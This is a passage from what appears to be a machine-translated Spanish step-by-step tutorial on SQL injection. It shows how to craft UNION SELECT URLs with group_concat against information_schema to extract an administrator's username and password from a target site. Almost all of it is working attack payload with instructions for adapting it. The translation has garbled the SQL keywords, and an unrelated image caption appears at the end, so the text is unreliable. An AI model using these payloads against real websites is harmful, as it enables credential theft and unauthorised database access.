Paso 8: Buscar del administrador nombre de usuario y contraseña - parte 1
Esta es la etapa final, borrar los comandos que es negrita:
http://Vulnerable.com/goodies.php?id=-1/buy.php?Id=-1 union select 1, group_concat (column_name), 3,4,5,6,7,8 de information_schema.columns donde table_name = 0x6e696674795f61646d696e--
Aquí está la dirección de la Web te queda:
http://vulnerable.com/Goodies.php?id=-1/Buy.php?id=-1 union select 1, group_concat (), 3,4,5,6,7, 8 de
Ahora, entre los soportes de los group_concat()de comando, escriba en las siguientes palabras:
* Username_Column *, 0x20616e6420, * Password_Column *
Asegúrese de reemplazar * Username_Column * con su nombre de columna de nombre de usuario y la * Password_Column * con su nombre de columna de contraseña (en mi caso admin es el nombre de columna de nombre de usuario y el pass es el nombre de columna de contraseña)
Ahora tu dirección web se verá algo como esto:
http://Vulnerable.com/goodies.php?id=-1/buy.php?Id=-1 union select 1, group_concat (* Username_Column *, 0x20616e6420, * Password_Column *), 3,4,5,6,7,8 de
![Velocidad de visualización independiente de hélice [con base de datos de letra inglesa]](https://foto.askix.com/thumb/170x110/6/0e/60e234f5ace611ef4ed70e109f9e00dc.jpg "Velocidad de visualización independiente de hélice [con base de datos de letra inglesa]")